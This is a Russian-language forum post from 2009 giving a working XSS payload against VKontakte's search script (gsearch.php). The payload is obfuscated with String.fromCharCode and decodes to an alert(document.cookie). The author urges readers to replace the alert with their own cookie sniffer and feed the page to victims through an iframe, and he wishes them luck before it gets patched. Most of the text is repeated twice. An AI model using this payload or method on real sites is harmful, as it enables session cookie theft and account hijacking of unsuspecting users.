wildshaman
16.06.2009, 11:49
Сегодня увидел на форуме тему _spamer_, то кто-то ему вапривал какие-то ссылки, посмотрел исходник тех страниц - увидел там в iframe какую-то ссылку на вконтатке. XSS, подумал я. так оно и оказалось. XSS была зашифрована, расшифроваа, я ее разобрал и сейчас представляю Вам.
Сама XSS наодится в скрипте нового поиска - gsearch и выглядит вот так (выводит куки алертом):
http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCha rCode(60,105,109,103,32,115,114,99,61,34,106,97,11 8,97,115,99,114,105,112,116,58,97,108,101,114,116, 40,100,111,99,117,109,101,110,116,46,99,111,111,10 7,105,101,41,34,62))//
здесь в String.fromCharCode зашифровано следующее:
<img src="javascript:alert(document.cookie)">
, шифровал я с помощью http://ha.ckers.org/xss.html (внизу строка Decimal Value:), заменив &# на запятую (и убрав первую).
Вместо вывода куков вы можете подставить туда свой снифер, зашифроать, а затем впаривать в iframe данную страницу. удачи в использовании, засекаем время, пока не прикроют :)
На стаью не претендую, просто для новичков расписал все немного подробнее.
Сама XSS наодится в скрипте нового поиска - gsearch и выглядит вот так (выводит куки алертом):
http://vkontakte.ru/gsearch.php?q=%5C%27;document.write(String.fromCha rCode(60,105,109,103,32,115,114,99,61,34,106,97,11 8,97,115,99,114,105,112,116,58,97,108,101,114,116, 40,100,111,99,117,109,101,110,116,46,99,111,111,10 7,105,101,41,34,62))//
здесь в String.fromCharCode зашифровано следующее:
<img src="javascript:alert(document.cookie)">
, шифровал я с помощью http://ha.ckers.org/xss.html (внизу строка Decimal Value:), заменив &# на запятую (и убрав первую).
Вместо вывода куков вы можете подставить туда свой снифер, зашифроать, а затем впаривать в iframe данную страницу. удачи в использовании, засекаем время, пока не прикроют :)
На стаью не претендую, просто для новичков расписал все немного подробнее.